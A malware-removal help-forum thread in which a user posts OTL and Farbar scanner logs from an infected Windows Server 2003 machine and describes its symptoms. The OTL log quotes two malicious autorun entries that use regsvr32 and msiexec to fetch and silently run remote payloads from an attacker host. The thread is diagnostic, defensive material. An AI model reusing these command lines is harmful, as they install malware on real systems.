
Help Trojan 2003 server svchost and explorer.exe sending http connections


5 replies to this topic

#1 jtcote

jtcote

  • Members
  • 4 posts

Posted 18 May 2017 - 06:39 PM

 
 
 
OTL logfile created on: 5/18/2017 4:18:43 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     *********************
64bit-Windows Server 2003 Standard Edition Service Pack 2 (Version = 5.2.3790) - Type = NTServer
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409  | Language: ENU | Date Format: M/d/yyyy
 
3.99 Gb Total Physical Memory | 2.69 Gb Available Physical Memory | 67.47% Memory free
5.73 Gb Paging File | 4.50 Gb Available in Paging File | 78.59% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 139.73 Gb Total Space | 89.28 Gb Free Space | 63.90% Space Free | Partition Type: NTFS


Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2011/11/21 17:10:48 | 000,148,808 | ---- | M] (CA) -- C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe
PRC - [2011/11/21 16:53:02 | 000,439,624 | ---- | M] (CA) -- C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe
PRC - [2011/11/21 16:52:40 | 000,016,200 | ---- | M] (CA) -- C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\AgPkiMon.exe
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2017/03/14 11:47:02 | 001,725,408 | ---- | M] (GlavSoft LLC.) [Auto | Running] -- C:\Program Files\TightVNC\tvnserver.exe -- (tvnserver)

SRV:64bit: - [2011/11/21 16:39:12 | 001,063,240 | ---- | M] (CA) [Auto | Running] -- C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\UnivAgent.exe -- (CASUniversalAgent)

SRV - [2013/02/28 18:48:58 | 000,118,520 | ---- | M] (Riverbed Technology, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WinPcap\rpcapd.exe -- (rpcapd)
SRV - [2011/11/21 17:10:48 | 000,148,808 | ---- | M] (CA) [Auto | Running] -- C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe -- (OpenFileAgent)
SRV - [2011/11/21 16:53:02 | 000,439,624 | ---- | M] (CA) [Auto | Running] -- C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe -- (CASDiscovery)
SRV - [2010/08/18 01:31:42 | 000,111,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\WINDOWS\system32\spoolsv.exe -- (Spooler)
SRV - [2007/02/18 05:00:00 | 000,792,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\ntfrs.exe -- (NtFrs)
SRV - [2007/02/18 05:00:00 | 000,164,864 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\dfssvc.exe -- (Dfs)
SRV - [2007/02/18 05:00:00 | 000,094,720 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\SysWOW64\llssrv.exe -- (LicenseService)
SRV - [2007/02/18 05:00:00 | 000,077,312 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll -- (helpsvc)
SRV - [2007/02/18 05:00:00 | 000,067,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\rsopprov.exe -- (RSoPProv)
SRV - [2007/02/18 05:00:00 | 000,040,448 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\SysWOW64\ismserv.exe -- (IsmServ)
SRV - [2007/02/18 05:00:00 | 000,039,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\wdfmgr.exe -- (UMWdf)
SRV - [2007/02/18 05:00:00 | 000,006,656 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\WINDOWS\Temp\ntshrui.dll -- (Iprip)
 
 
========== Driver Services (SafeList) ==========
 
DRV - [2007/02/18 05:00:00 | 000,033,792 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\WINDOWS\SysWow64\mnmdd.dll -- (mnmdd)
DRV - [2007/02/18 05:00:00 | 000,002,864 | ---- | M] (Microsoft Corporation) [Adapter | On_Demand | Unknown] -- C:\WINDOWS\SysWow64\winsock.dll -- (Winsock)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF:64bit: - HKLM\Software\MozillaPlugins\@t.garena.com/garenatalk: C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll File not found
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
 
 
Hosts file not found
O3:64bit: - HKCU\..\Toolbar\ShellBrowser: (&Address) - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - %SystemRoot%\system32\browseui.dll File not found
O3:64bit: - HKCU\..\Toolbar\WebBrowser: (&Address) - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - %SystemRoot%\system32\browseui.dll File not found
O3:64bit: - HKCU\..\Toolbar\WebBrowser: (&Links) - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - %SystemRoot%\system32\SHELL32.dll File not found
O4:64bit: - HKLM..\Run: [start] regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll File not found
O4:64bit: - HKLM..\Run: [start1] msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q File not found
O4:64bit: - HKLM..\Run: [tvncontrol] C:\Program Files\TightVNC\tvnserver.exe (GlavSoft LLC.)
O4 - Startup: C:\Documents and Settings\Administrator.ART\Start Menu\Programs\Startup\Prophecy System Tray.lnk =  File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: ShowSuperHidden = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: disablecad = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 149
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000001 [] - %SystemRoot%\System32\mswsock.dll File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000002 [] - %SystemRoot%\System32\winrnr.dll File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000003 [] - %SystemRoot%\System32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000001 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000002 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000003 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000004 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000005 - %SystemRoot%\system32\mswsock.dll File not found
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = art.local
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C3E0C66F-BDEA-43BB-85C9-E83C3F24C615}: NameServer = 10.10.10.230,10.10.10.231
O18:64bit: - Protocol\Handler\about {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\cdl {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\file {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\ftp {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\gopher {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\http {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\https {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll File not found
O18:64bit: - Protocol\Handler\javascript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\local {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\mailto {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\mhtml {05300401-BCBC-11d0-85E3-00C04FD85AB4} - %SystemRoot%\system32\inetcomm.dll File not found
O18:64bit: - Protocol\Handler\mk {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\ms-its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll File not found
O18:64bit: - Protocol\Handler\res {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\sysimage {76E67A63-06E9-11D2-A840-006008059382} - %SystemRoot%\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\wia {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll File not found
O18:64bit: - Protocol\Filter\Class Install Handler {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\deflate {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\gzip {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\lzdhtml {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\text/webviewhtml {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - %SystemRoot%\system32\SHELL32.dll File not found
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) -  File not found
O20:64bit: - HKLM Winlogon: UIHost - (%SystemRoot%\system32\logonui.exe) -  File not found
O20:64bit: - HKLM Winlogon: VMApplet - (Control_RunDLL "sysdm.cpl") -  File not found
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: System - (lsass.exe) -  File not found
O20 - HKLM Winlogon: UserInit - (userinit) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\crypt32chain: DllName - (crypt32.dll) -  File not found
O20:64bit: - Winlogon\Notify\cryptnet: DllName - (cryptnet.dll) -  File not found
O20:64bit: - Winlogon\Notify\cscdll: DllName - (cscdll.dll) -  File not found
O20:64bit: - Winlogon\Notify\dimsntfy: DllName - (dimsntfy.dll) -  File not found
O20:64bit: - Winlogon\Notify\ScCertProp: DllName - (wlnotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\Schedule: DllName - (wlnotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\sclgntfy: DllName - (sclgntfy.dll) -  File not found
O20:64bit: - Winlogon\Notify\SensLogn: DllName - (WlNotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\termsrv: DllName - (wlnotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\wlballoon: DllName - (wlnotify.dll) -  File not found
O20 - Winlogon\Notify\ScCertProp: DllName - (wlnotify.dll) -  File not found
O20 - Winlogon\Notify\Schedule: DllName - (wlnotify.dll) -  File not found
O20 - Winlogon\Notify\SensLogn: DllName - (WlNotify.dll) -  File not found
O20 - Winlogon\Notify\wlballoon: DllName - (wlnotify.dll) -  File not found
O21:64bit: - SSODL: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\system32\SHELL32.dll File not found
O21:64bit: - SSODL: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\system32\SHELL32.dll File not found
O21:64bit: - SSODL: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\system32\stobject.dll File not found
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\WINDOWS\system32\webcheck.dll File not found
O22:64bit: - SharedTaskScheduler: {438755C2-A8BA-11D1-B96B-00A0C90312E1} - Browseui preloader - %SystemRoot%\system32\browseui.dll File not found
O22:64bit: - SharedTaskScheduler: {8C7461EF-2B13-11d2-BE35-3078302C2030} - Component Categories cache daemon - %SystemRoot%\system32\browseui.dll File not found
O28:64bit: - HKLM ShellExecuteHooks: {AEB6717E-7E19-11d0-97EE-00C04FD91972} - shell32.dll File not found
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/11/13 15:06:19 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========

[2017/05/10 19:46:33 | 000,000,000 | ---D | C] -- C:\WINDOWS\Minidump
[2017/05/02 23:34:10 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Updates
[2017/05/02 23:34:09 | 000,139,264 | ---- | C] (Microsoft) -- C:\WINDOWS\UpdateInstaller.exe
[5 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[2 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2017/05/18 16:22:28 | 000,038,742 | ---- | M] () -- C:\WINDOWS\ZAM.krnl.trace
[2017/05/18 16:22:28 | 000,029,945 | ---- | M] () -- C:\WINDOWS\ZAM_Guard.krnl.trace
[2017/05/18 16:13:02 | 000,001,144 | RHS- | M] () -- C:\Documents and Settings\All Users\ntuser.pol
[2017/05/18 16:12:48 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2017/05/15 20:45:40 | 000,000,638 | ---- | M] () -- C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to mbar.lnk
[2017/05/15 20:05:19 | 000,000,678 | ---- | M] () -- C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to Tcpview.lnk
[2017/05/15 15:22:55 | 000,000,664 | ---- | M] () -- C:\WINDOWS\SysWow64\d3d9caps.dat
[2017/05/15 14:20:20 | 000,001,061 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\VMware vCenter Converter Standalone Client.lnk
[2017/05/15 14:20:18 | 000,001,024 | ---- | M] () -- C:\.rnd
[2017/05/12 16:36:36 | 000,000,085 | ---- | M] () -- C:\WINDOWS\wininit.ini
[2017/05/10 19:46:31 | 934,907,904 | ---- | M] () -- C:\WINDOWS\MEMORY.DMP
[2017/05/02 23:34:09 | 000,139,264 | ---- | M] (Microsoft) -- C:\WINDOWS\UpdateInstaller.exe
[5 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[2 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
 
========== Files Created - No Company Name ==========

[2017/05/15 20:05:19 | 000,000,678 | ---- | C] () -- C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to Tcpview.lnk
[2017/05/15 15:21:09 | 000,038,508 | ---- | C] () -- C:\WINDOWS\ZAM.krnl.trace
[2017/05/15 15:21:01 | 000,029,699 | ---- | C] () -- C:\WINDOWS\ZAM_Guard.krnl.trace
[2017/05/15 14:20:19 | 000,001,061 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\VMware vCenter Converter Standalone Client.lnk
[2017/05/15 10:54:00 | 000,001,592 | ---- | C] () -- C:\Documents and Settings\Administrator.ART\Desktop\Event Viewer.lnk
[2017/05/12 16:36:31 | 000,000,085 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2017/02/17 18:14:13 | 000,000,000 | ---- | C] () -- C:\WINDOWS\admin.INI
[2015/12/05 03:24:23 | 000,157,696 | ---- | C] () -- C:\WINDOWS\ERUNT.exe
[2015/05/13 17:27:23 | 000,000,440 | RHS- | C] () -- C:\Documents and Settings\Administrator.ART\ntuser.pol
[2015/05/07 15:26:33 | 000,000,218 | ---- | C] () -- C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\recently-used.xbel
[2013/11/14 10:01:10 | 000,001,144 | RHS- | C] () -- C:\Documents and Settings\All Users\ntuser.pol
 
========== ZeroAccess Check ==========
 
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = %SystemRoot%\system32\shdocvw.dll
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\SysWOW64\shdocvw.dll -- [2015/04/08 22:46:40 | 001,520,128 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\WINDOWS\system32\wbem\fastprox.dll
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = C:\WINDOWS\SysWOW64\wbem\fastprox.dll -- [2009/03/19 19:51:22 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\WINDOWS\system32\wbem\wbemess.dll
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
< End of report >



 


#2 jtcote

jtcote
  • Topic Starter

  • Members
  • 4 posts

Posted 18 May 2017 - 07:21 PM

FSS scan output:

 

Farbar Service Scanner Version: 27-01-2016
Ran by Administrator (administrator) on 18-05-2017 at 17:19:08
Running from "C:\Documents and Settings\Administrator.ART\My Documents\Downloads"
Microsoft® Windows® Server 2003 Standard x64 Edition Service Pack 2 (X64)
Boot Mode: Normal
****************************************************************
Internet Services:
============
Nsi Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open Nsi registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open Nsi registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open Nsi registry key. The service key does not exist.
nsiproxy Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open nsiproxy registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open nsiproxy registry key. The service key does not exist.
Checking LEGACY_nsiproxy: ATTENTION!=====> Unable to open LEGACY_nsiproxy\0000 registry key. The key does not exist.
tdx Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open tdx registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open tdx registry key. The service key does not exist.
Checking LEGACY_tdx: ATTENTION!=====> Unable to open LEGACY_tdx\0000 registry key. The key does not exist.

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
ATTENTION!=====> local policy on IP:
Key: "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local"
Value: "ActivePolicy"
Data: "SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{37dd8956-8de4-46d2-abc4-90098777d79b}"

Windows Firewall:
=============
mpsdrv Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open mpsdrv registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open mpsdrv registry key. The service key does not exist.
Checking LEGACY_mpsdrv: ATTENTION!=====> Unable to open LEGACY_mpsdrv\0000 registry key. The key does not exist.
MpsSvc Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open MpsSvc registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open MpsSvc registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open MpsSvc registry key. The service key does not exist.
bfe Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open bfe registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open bfe registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open bfe registry key. The service key does not exist.

Firewall Disabled Policy:
==================
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall"=DWORD:0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=DWORD:0

System Restore:
============
SDRSVC Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open SDRSVC registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open SDRSVC registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open SDRSVC registry key. The service key does not exist.

System Restore Policy:
========================

Security Center:
============
wscsvc Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.

Windows Update:
============
Windows Autoupdate Disabled Policy:
============================

Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open WinDefend registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open WinDefend registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open WinDefend registry key. The service key does not exist.

Windows Defender Disabled Policy:
==========================

Other Services:
==============
Checking Start type of iphlpsvc: ATTENTION!=====> Unable to open iphlpsvc registry key. The service key does not exist.
Checking ImagePath of iphlpsvc: ATTENTION!=====> Unable to open iphlpsvc registry key. The service key does not exist.
Checking ServiceDll of iphlpsvc: ATTENTION!=====> Unable to open iphlpsvc registry key. The service key does not exist.
Checking FirewallRules of SharedAccess: ATTENTION!=====> Unable to open "SharedAccess\Defaults\FirewallPolicy\FirewallRules" registry key. The key does not exist.
Checking FirewallRules of SharedAccess: ATTENTION!=====> Unable to open "SharedAccess\Parameters\FirewallPolicy\FirewallRules" registry key. The key does not exist.
Checking ServiceDll of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
Checking Start type of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
Checking ServiceDll of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
 
File Check:
========
ATTENTION!=====> C:\Windows\System32\nsisvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\nsiproxy.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\afd.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\tdx.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\Drivers\tcpip.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\dnsrslvr.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\dnsapi.dll FILE IS MISSING.
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
ATTENTION!=====> C:\Windows\System32\mpssvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\bfe.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\mpsdrv.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\SDRSVC.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\vssvc.exe FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\wscsvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\wbem\WMIsvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\wuaueng.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\qmgr.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\es.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\cryptsvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Program Files\Windows Defender\MpSvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\svchost.exe FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\rpcss.dll FILE IS MISSING.
 
**** End of log ****
 
 
Moved from Windows server due to OTL logs.
NickAu

Edited by NickAu, 18 May 2017 - 08:11 PM.
Mod Edit


#3 jtcote

jtcote
  • Topic Starter

  • Members
  • 4 posts

Posted 19 May 2017 - 10:24 AM

SOME MORE DIAGNOSTICS:

- Web Browsers are unable to reach most of the sites except yahoo and sometimes google.com.

- Machine lost some network shares that were on C:\subfolders:

- Seems like NetBIOS or SMB server (not client) is not working.

- Unable to run Windows update

- Unable to query properties of processes on TCPVIEW. A hidden [System Process] was sending http connections but alternatively svchost and explorer.exe were sending the same connections out.

- Reports from ClamWin detected:

- Most recent Malwarebytes AntiRootkit log file:


Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
  main:    v2017.05.19.01
  rootkit: v2017.04.02.01
Windows Server 2003 Service Pack 2 x64 NTFS
Internet Explorer 8.0.6001.18702
Administrator :: IVR02 [administrator]
5/18/2017 8:50:07 PM
